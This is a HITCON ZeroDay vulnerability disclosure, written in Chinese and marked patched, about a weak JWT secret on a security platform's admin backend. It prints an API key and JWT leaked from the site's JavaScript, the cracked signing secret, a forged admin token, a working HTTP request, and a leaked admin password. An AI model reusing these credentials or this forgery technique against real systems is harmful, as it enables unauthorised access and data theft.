工業技術研究院資安整合平臺JWT弱密碼僞造憑證登錄 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2020-00178
  •  發信 Vendor: SECPAAS 資安整合服務平台
  • Title: 工業技術研究院資安整合平臺JWT弱密碼僞造憑證登錄
  • Introduction: JWT弱密碼僞造憑證

處理狀態

目前狀態

公開
Last Update : 2020/06/16
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 未複測
  • 公開

處理歷程

  • 2020/04/09 21:05:20 : 新提交 (由 不會講幹話的大陸仔 更新此狀態)
  • 2020/04/09 21:15:25 : 新提交 (由 不會講幹話的大陸仔 更新此狀態)
  • 2020/04/09 23:40:21 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/04/10 15:40:19 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/04/10 15:40:19 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/04/10 17:29:07 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/04/10 17:29:07 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/04/10 17:29:07 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/06/08 17:19:09 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/06/16 03:00:03 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

參考資料

使用預設密碼或過於簡單之密碼,可經由該問題取得後台完整權限,且容易造成大量資訊外洩。

OWASP Top 10 - 2017 A2 - Broken_Authentication
https://www.owasp.org/index.php/Top_10-2017_A2-Broken_Authentication

CWE-521: Weak Password Requirements
https://cwe.mitre.org/data/definitions/521.html

HOW SECURE IS MY PASSWORD?
https://howsecureismypassword.net/
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://secpaas.org.tw/back/userManage

敘述

https://secpaas.org.tw/js/pages/entrance/login.page.js
看這裏啦,泄露apikey啦 

 var apikey = "57616835-fefa-46f6-9bd5-acd6ab774bfe";

請求後臺管理頁面需要另外一個值。authkey
https://secpaas.org.tw/js/pages/manage/new-scan.page.js 看這裏面啦~

 var headers = {'apikey':'57616835-fefa-46f6-9bd5- acd6ab774bfe', 'authkey':'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwibmFtZSI6ImJpbGx3YW5nIiwicm9sZSI6MCwiaWF0IjoxNTI1MzMzNzI1LCJleHAiOjE1MjUzNDgxMjV9.nVFF5GmmGctTCnV1LmRGLXMAn1DY0nER55oJj38lWiE'};

這裏面泄露authkey啦~ 我們用JWT-Crack跑一下密文,得出密鑰為mask
通過https://jwt.io
我們構造一個

{
  "id": 1,
  "name": "billwang",
  "role": 0,
  "iat": 1525333725,
  "exp": 1625348125
}

這樣子就可以僞造憑證啦~
我們生成jwt token

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwibmFtZSI6ImJpbGx3YW5nIiwicm9sZSI6MCwiaWF0IjoxNTI1MzMzNzI1LCJleHAiOjE2MjUzNDgxMjV9.RRvHW6zTbeM3wGwpmXRYXSGv7CvI_UFBrVHj7ZoStlk

Chrome摁下F12鍵,打開 開發者工具。

var headers = {'apikey':'57616835-fefa-46f6-9bd5-acd6ab774bfe', 'authkey':'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwibmFtZSI6ImJpbGx3YW5nIiwicm9sZSI6MCwiaWF0IjoxNTI1MzMzNzI1LCJleHAiOjE2MjUzNDgxMjV9.RRvHW6zTbeM3wGwpmXRYXSGv7CvI_UFBrVHj7ZoStlk'};

請求一下就能獲得賬戶的相關信息呢。

GET /sec/user_personal HTTP/1.1
Host: secpaas.org.tw
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Accept: application/json, text/javascript, */*; q=0.01
Sec-Fetch-Dest: empty
apikey: 57616835-fefa-46f6-9bd5-acd6ab774bfe
X-Requested-With: XMLHttpRequest
authkey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwibmFtZSI6ImJpbGx3YW5nIiwicm9sZSI6MCwiaWF0IjoxNTI1MzMzNzI1LCJleHAiOjE2MjUzNDgxMjV9.RRvHW6zTbeM3wGwpmXRYXSGv7CvI_UFBrVHj7ZoStlk
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: https://secpaas.org.tw/personal
Accept-Encoding: gzip, deflate, br
Accept-Language: en

通過伺服器返回結果發現賬號密碼竟然是 [email protected] / admin 呢!

裏面泄露一些資安廠商對一些個案的掃描結果啦。我因爲個人原因不方便查看啦~
特請貴平台同仁幫忙處理謝謝啦~

修補建議

更改JWT口令、修復弱口令。
刪除程式中不必要的調試所需的注釋啦~很危險的

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;